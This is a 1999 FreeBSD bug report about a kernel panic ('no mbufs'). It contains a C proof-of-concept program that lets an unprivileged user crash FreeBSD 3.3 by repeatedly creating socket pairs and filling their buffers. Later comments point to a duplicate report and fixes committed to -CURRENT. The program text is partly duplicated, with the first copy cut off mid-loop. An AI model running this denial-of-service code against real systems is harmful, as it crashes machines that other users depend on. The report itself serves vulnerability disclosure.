Bug 14226

Summary: panic: no mbufs
Product: Base System Reporter: jar <jar>
Component: kernAssignee: Brian Feldman <green>
Status: Closed FIXED    
Severity: Affects Only Me    
Priority: Normal    
Version: Unspecified   
Hardware: Any   
OS: Any   

Description jar 1999-10-09 10:40:00 UTC 
The following program running by any unprivileged user
crashes FreeBSD 3.3-RC (RELEASE and STABLE as well)

#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}

How-To-Repeat: Build and run the program
Comment 1 bmilekic@dsuper.net 1999-12-06 02:09:22 UTC 
  Yaroslav,

  I would recommend for you to take a look at PR: kern/14042 -- I filed
  this just a few days before you filed yours.

	In effect, the PR deals with the same situation, and offers a
  potential element in helping solve it (with addition to sbsize limiting
  through login.conf -- unfortunately only available for -CURRENT at the
  present time). I would recommend that you post further feedback, if you
  still feel that it is necessary in response to that PR, so that someone
  with the proper privilages may close this one, so that the number of
  duplicate PRs may go down. I for one am thankful for your initial posting
  and hope that you will find time to contribute to solving further
  problems, if the need arises.

  -Bosko.

--
  Bosko Milekic <bmilekic@technokratis.com>
Comment 2 bill fumerola freebsd_committer freebsd_triage 1999-12-13 21:22:26 UTC 
State Changed
From-To: open->closed

Fixes were committed to -CURRENT to stop this, see  
kern/14042.
Comment 3 bill fumerola freebsd_committer freebsd_triage 1999-12-13 21:22:26 UTC 
Responsible Changed
From-To: freebsd-bugs->green

Brian committed the fixes to stop this.